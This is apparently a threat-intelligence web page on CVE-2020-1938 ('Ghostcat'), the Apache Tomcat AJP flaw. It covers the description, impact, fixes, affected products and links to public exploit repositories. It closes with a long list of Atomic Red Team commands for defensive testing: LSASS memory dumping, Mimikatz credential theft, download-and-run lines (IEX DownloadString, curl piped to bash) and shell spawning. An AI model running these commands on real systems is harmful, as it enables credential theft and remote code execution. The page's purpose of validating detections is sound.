CVE-2020-1938
Overview
This vulnerability is a file inclusion and remote code execution flaw caused by improper trust and access control in the Apache JServ Protocol (AJP) Connector within Apache Tomcat. The root cause lies in the AJP Connector being enabled by default and listening on all network interfaces without adequate restrictions, allowing untrusted connections to exploit the protocol's trust assumptions. The affected component is the AJP Connector in Apache Tomcat versions 7.0.0 to 7.0.99, 8.5.0 to 8.5.50, and 9.0.0.M1 to 9.0.0.30.
Vulnerability Description
When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed: - returning arbitrary files from anywhere in the web application - processing any file in the web application as a JSP Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations.
Impact
An attacker with network access to the AJP port can read sensitive files anywhere within the web application and execute arbitrary code by uploading or controlling JSP files. No authentication or user interaction is required beyond network access to the AJP service. This can lead to full system compromise, data exfiltration, and unauthorized control over the affected server, severely impacting confidentiality, integrity, and availability of the application and underlying system.
Solution
Users should upgrade Apache Tomcat to versions 9.0.31, 8.5.51, or 7.0.100 or later, where the default AJP Connector configuration has been hardened. If upgrading is not immediately possible, the AJP Connector should be disabled or restricted to trusted IP addresses. Detailed patch instructions and advisories are available from vendor sources such as the Fedora Project security announcements (e.g., https://lists.fedoraproject.org/archives/list/[email protected]/message/2XFLQB3O5QVP4ZBIPVIXBEZV7F2R7ZMS/) and Apache Tomcat official mailing list announcements.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The vulnerability associated with the Apache JServ Protocol (AJP) in Apache Tomcat arises from the default configuration that allows AJP connections to be treated with a higher trust level than standard HTTP connections. This misconfiguration can lead to significant security risks, particularly when the AJP Connector is enabled and accessible from untrusted networks. The default behavior of Tomcat to listen on all configured IP addresses for AJP connections means that if an attacker can reach this port, they can exploit it to gain unauthorized access to sensitive files within the web application. The ability to return arbitrary files and process them as JSPs can lead to severe consequences, including remote code execution.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could leverage the AJP Connector to send crafted requests that exploit the trust relationship established by Tomcat. For instance, if the web application allows file uploads and stores these files in a location accessible to the AJP Connector, an attacker could upload malicious files and subsequently execute them as JSPs. This scenario highlights the critical need for organizations to understand their network configurations and the implications of exposing AJP ports to untrusted users. Additionally, if the web application is poorly secured or has other vulnerabilities, the risk of exploitation increases significantly.
The real-world impact of this vulnerability is substantial, particularly for organizations that rely on Apache Tomcat for their web applications. Successful exploitation can lead to unauthorized access to sensitive data, data breaches, and the potential for attackers to take control of the affected server. This not only poses a direct threat to the integrity and confidentiality of the data but also carries significant business risks, including reputational damage, regulatory penalties, and financial losses. Organizations must recognize that the consequences of such vulnerabilities extend beyond immediate technical concerns and can affect customer trust and stakeholder confidence.
To effectively detect and mitigate this vulnerability, organizations should adopt a multi-layered security approach. First and foremost, it is critical to disable the AJP Connector if it is not required for the application’s functionality. Regular audits of server configurations should be conducted to ensure that unnecessary services are not exposed. For those who need to use the AJP Connector, implementing strict access controls and network segmentation can help limit exposure to trusted networks only. Furthermore, upgrading to the latest versions of Apache Tomcat, which include hardened configurations and security enhancements, is essential to reduce the risk of exploitation. Organizations should also consider employing web application firewalls (WAFs) to monitor and filter traffic to the AJP Connector, providing an additional layer of protection against potential attacks.
In conclusion, the vulnerability associated with the AJP Connector in Apache Tomcat underscores the importance of secure configuration practices and the need for continuous monitoring of web application environments. By understanding the technical details of the vulnerability, recognizing potential attack vectors, assessing real-world impacts, and implementing robust detection and mitigation strategies, organizations can significantly reduce their risk exposure and enhance their overall security posture.
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2020-1938, accompanied by the emergence of new proof-of-concept tools that automate vulnerability verification and facilitate attack execution. This development broadens the exploit landscape, lowering the technical barrier for threat actors to leverage the Apache Tomcat AJP Connector vulnerability. Although ransomware groups have not been definitively linked to this activity, the association of Iranian IRGC data extortion operations with this vulnerability underscores the potential for its use in targeted data theft campaigns. Our telemetry indicates that while the overall probability of exploitation remains high, the rapid increase in accessible exploit tools elevates the immediacy and ease with which adversaries can conduct reconnaissance and exploitation. Consequently, the threat level associated with CVE-2020-1938 should be considered heightened, reflecting an increased risk of opportunistic and targeted attacks leveraging automated methods.
Update 2 — June 07, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2020-1938, accompanied by the emergence of several new proof-of-concept tools that automate vulnerability verification and exploitation. This proliferation of publicly available exploit frameworks lowers the technical barrier for adversaries, increasing the likelihood of opportunistic attacks. Our telemetry indicates that these developments coincide with a subtle but sustained uptick in reconnaissance activity against Apache Tomcat instances exposing the vulnerable AJP connector. Although the ransomware linkage remains unconfirmed, the continued interest from Iranian IRGC-aligned actors suggests persistent targeting for data exfiltration purposes. Collectively, these factors elevate the threat level by amplifying both the accessibility and immediacy of exploitation, underscoring an increased risk of compromise for organizations with unmitigated exposures.
Affected Products (38)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Apache | Geode | 1.12.0 |
cpe:2.3:a:apache:geode:1.12.0:*:*:*:*:*:*:*
|
|
|
Apache | Tomcat | All |
cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:*
|
|
|
Apache | Tomcat | All |
cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:*
|
|
|
Apache | Tomcat | All |
cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:*
|
|
|
Fedoraproject | Fedora | 30 |
cpe:2.3:o:fedoraproject:fedora:30:*:*:*:*:*:*:*
|
|
|
Fedoraproject | Fedora | 31 |
cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*
|
|
|
Fedoraproject | Fedora | 32 |
cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*
|
|
|
Oracle | Agile Engineering Data Management | 6.2.1.0 |
cpe:2.3:a:oracle:agile_engineering_data_management:6.2.1.0:*:*:*:*:*:*:*
|
|
|
Oracle | Agile Plm | 9.3.3 |
cpe:2.3:a:oracle:agile_plm:9.3.3:*:*:*:*:*:*:*
|
|
|
Oracle | Agile Plm | 9.3.5 |
cpe:2.3:a:oracle:agile_plm:9.3.5:*:*:*:*:*:*:*
|
|
|
Oracle | Agile Plm | 9.3.6 |
cpe:2.3:a:oracle:agile_plm:9.3.6:*:*:*:*:*:*:*
|
|
|
Oracle | Communications Element Manager | 8.1.1 |
cpe:2.3:a:oracle:communications_element_manager:8.1.1:*:*:*:*:*:*:*
|
|
|
Oracle | Communications Element Manager | 8.2.0 |
cpe:2.3:a:oracle:communications_element_manager:8.2.0:*:*:*:*:*:*:*
|
|
|
Oracle | Communications Element Manager | 8.2.1 |
cpe:2.3:a:oracle:communications_element_manager:8.2.1:*:*:*:*:*:*:*
|
|
|
Oracle | Communications Instant Messaging Server | 10.0.1.4.0 |
cpe:2.3:a:oracle:communications_instant_messaging_server:10.0.1.4.0:*:*:*:*:*:*:*
|
|
|
Oracle | Health Sciences Empirica Inspections | 1.0.1.2 |
cpe:2.3:a:oracle:health_sciences_empirica_inspections:1.0.1.2:*:*:*:*:*:*:*
|
|
|
Oracle | Health Sciences Empirica Signal | 7.3.3 |
cpe:2.3:a:oracle:health_sciences_empirica_signal:7.3.3:*:*:*:*:*:*:*
|
|
|
Oracle | Hospitality Guest Access | 4.2.0 |
cpe:2.3:a:oracle:hospitality_guest_access:4.2.0:*:*:*:*:*:*:*
|
|
|
Oracle | Hospitality Guest Access | 4.2.1 |
cpe:2.3:a:oracle:hospitality_guest_access:4.2.1:*:*:*:*:*:*:*
|
|
|
Oracle | Instantis Enterprisetrack | All |
cpe:2.3:a:oracle:instantis_enterprisetrack:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Apache Tomcat AJP File Read
auxiliary/admin/http/tomcat_ghostcat
|
A Security Researcher of Chaitin Tech, SunCSR Team | Unknown | - | View |
ExploitDB (2)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| Apache Tomcat - AJP 'Ghostcat File Read/Inclusion | YDHCUI | webapps | multiple | - | View |
| Apache Tomcat - AJP 'Ghostcat' File Read/Inclusion (Metasploit) | SunCSR | webapps | multiple | - | View |
GitHub PoCs (38)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
00theway/Ghostcat-CNVD-2020-10487
Ghostcat read file/code execute,CNVD-2020-10487(CVE-2020-1938)
|
00theway | 419 | 112 | 2020-02-22 | View |
|
bkfish/CNVD-2020-10487-Tomcat-Ajp-lfi-Scanner
Cnvd-2020-10487 / cve-2020-1938, scanner tool
|
bkfish | 293 | 93 | 2020-02-20 | View |
|
lizhianyuguangming/TomcatScanPro
tomcat自动化漏洞扫描利用工具,支持批量弱口令检测、后台部署war包getshell、CVE-2017-12615 文件上传、CVE-2020-1938/CNVD-2020-10487 文件包含
|
lizhianyuguangming | 293 | 27 | 2024-08-29 | View |
|
tpt11fb/AttackTomcat
Tomcat常见漏洞GUI利用工具。CVE-2017-12615 PUT文件上传漏洞、tomcat-pass-getshell 弱认证部署war包、弱口令爆破、CVE-2020-1938 Tomcat AJP文件读取/包含
|
tpt11fb | 254 | 19 | 2022-11-13 | View |
|
sgdream/CVE-2020-1938
CVE-2020-1938
|
sgdream | 3 | 89 | 2020-02-20 | View |
|
xindongzhuaizhuai/CVE-2020-1938
|
xindongzhuaizhuai | 45 | 38 | 2020-02-20 | View |
|
sv3nbeast/CVE-2020-1938-Tomact-file_include-file_read
Tomcat的文件包含及文件读取漏洞利用POC
|
sv3nbeast | 53 | 19 | 2020-02-21 | View |
|
laolisafe/CVE-2020-1938
CVE-2020-1938漏洞复现
|
laolisafe | 38 | 10 | 2020-02-21 | View |
|
Hancheng-Lei/Hacking-Vulnerability-CVE-2020-1938-Ghostcat
|
Hancheng-Lei | 18 | 12 | 2021-03-28 | View |
|
fairyming/CVE-2020-1938
在一定条件下可执行命令
|
fairyming | 11 | 11 | 2020-02-21 | View |
|
woaiqiukui/CVE-2020-1938TomcatAjpScanner
批量扫描TomcatAJP漏洞
|
woaiqiukui | 14 | 2 | 2020-02-21 | View |
|
dacade/CVE-2020-1938
|
dacade | 9 | 6 | 2020-02-21 | View |
|
doggycheng/CNVD-2020-10487
CVE-2020-1938 / CNVD-2020-1048 Detection Tools
|
doggycheng | 8 | 6 | 2020-03-27 | View |
|
fatal0/tomcat-cve-2020-1938-check
|
fatal0 | 7 | 4 | 2020-02-21 | View |
|
w4fz5uck5/CVE-2020-1938-Clean-Version
CVE-2020-1938(GhostCat) clean and readable code version
|
w4fz5uck5 | 6 | 5 | 2020-03-01 | View |
|
delsadan/CNVD-2020-10487-Bulk-verification
CNVD-2020-10487 OR CVE-2020-1938 批量验证脚本,批量验证,并自动截图,方便提交及复核
|
delsadan | 3 | 5 | 2020-02-22 | View |
|
whatboxapp/GhostCat-LFI-exp
CVE-2020-1938
|
whatboxapp | 0 | 7 | 2020-03-03 | View |
|
Just1ceP4rtn3r/CVE-2020-1938-Tool
批量检测幽灵猫漏洞
|
Just1ceP4rtn3r | 3 | 2 | 2020-03-20 | View |
|
YounesTasra-R4z3rSw0rd/CVE-2020-1938
This is a modified version of the original GhostCat Exploit
|
YounesTasra-R4z3rSw0rd | 3 | 0 | 2022-08-21 | View |
|
h7hac9/CVE-2020-1938
|
h7hac9 | 2 | 1 | 2020-02-21 | View |
|
Warelock/cve-2020-1938
cve-2020-1938 Tomcat-Ajp-lfi.git脚本
|
Warelock | 2 | 0 | 2024-04-14 | View |
|
Neko-chanQwQ/CVE-2020-1938
Scanner for CVE-2020-1938
|
Neko-chanQwQ | 1 | 1 | 2021-07-11 | View |
|
Umesh2807/Ghostcat
CVE-2020-1938 exploit
|
Umesh2807 | 0 | 2 | 2020-05-12 | View |
|
shaunmclernon/ghostcat-verification
Learnings on how to verify if vulnerable to Ghostcat (aka CVE-2020-1938)
|
shaunmclernon | 1 | 1 | 2020-02-26 | View |
|
With-fate/CVE-2020-1938
Apache Tomcat(CVE-2020-1938)漏洞验证脚本
|
With-fate | 1 | 0 | 2026-04-07 | View |
|
jptr218/ghostcat
An implementation of CVE-2020-1938
|
jptr218 | 1 | 0 | 2021-08-14 | View |
|
streghstreek/CVE-2020-1938
|
streghstreek | 1 | 0 | 2021-04-27 | View |
|
duckpigdog/Tomcat-AJP-CVE-2020-1938
Tomcat AJP文件读取/包含漏洞
|
duckpigdog | 0 | 0 | 2026-05-25 | View |
|
cyberguardsec101-sketch/ghostcat
CVE-2020-1938 Exploit
|
cyberguardsec101-sketch | 0 | 0 | 2026-05-09 | View |
|
si1ence90/Ghostcat-Tomcat-AJP-Exploit-Py3
A fully refactored, Python 3 compatible exploit script for Tomcat Ghostcat (CVE-2020-1938 / CNVD-2020-10487) AJP Local F...
|
si1ence90 | 0 | 0 | 2026-05-08 | View |
|
aidilzlkfli/Scanning
Analysis of network scan results, service vulnerabilities, OS fingerprinting, and critical Nessus findings including Gho...
|
aidilzlkfli | 0 | 0 | 2026-05-06 | View |
|
sangrok-jeon/CVE-2020-1938-Tomcat-AJP-Ghostcat--Analysis
CVE-2020-1938-Tomcat-AJP(Ghostcat)-Analysis
|
sangrok-jeon | 0 | 0 | 2026-04-08 | View |
|
I-Runtime-Error/CVE-2020-1938
This is about CVE-2020-1938
|
I-Runtime-Error | 0 | 0 | 2020-05-12 | View |
|
MateoSec/ghostcatch
Disables AJP connectors to remediate CVE-2020-1938!
|
MateoSec | 0 | 0 | 2020-07-17 | View |
|
acodervic/CVE-2020-1938-MSF-MODULE
Modified version of auxiliary/admin/http/tomcat_ghostcat, it can Read any file
|
acodervic | 0 | 0 | 2021-02-01 | View |
|
RedTeam-Rediron/CVE-2020-1938
|
RedTeam-Rediron | 0 | 0 | 2024-08-20 | View |
|
hopsypopsy8/CVE-2020-1938-Exploitation
|
hopsypopsy8 | 0 | 0 | 2025-02-15 | View |
|
abrewer251/CVE-2020-1938_Ghostcat-PoC
Apache Tomcat AJP Ghostcat (CVE-2020-1938) exploit tool for file disclosure with multi-target scanning, custom wordlists...
|
abrewer251 | 0 | 0 | 2025-12-11 | View |
Threat Feed
12 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Public exploit code is available for this vulnerability
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Deployed role: Linux · Web Server
Kill chain derived from the ML classifier. Pick the target OS above to see the OS-specific path and matching playbook.
Attack Vectors ML
MITRE ATT&CK Techniques (10)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
108 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump
"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
"#{dumpert_exe}"
#{xordump_exe} -out #{output_file} -x 0x41
if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
} elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
} else {
$binary_path = "File not found"
exit 1
}
$lsass_pid = get-process lsass |select -expand id
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force}
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
"#{venv_path}\Scripts\pypykatz" live lsa
#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
"#{psexec_exe}" #{remote_host} -accepteula -c #{command_path}
cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
powershell.exe -e #{obfuscated_code}
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
"function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
$cmdlets}
New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5
write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}
#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
ldapdomaindump -u #{username} -p #{password} #{target_ip} -o /tmp/T1087
ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" -s sub -a always -z 1000 dn
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
Invoke-Expression "#{adrecon_path}"
([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
net user administrator /domain
(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] OU Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
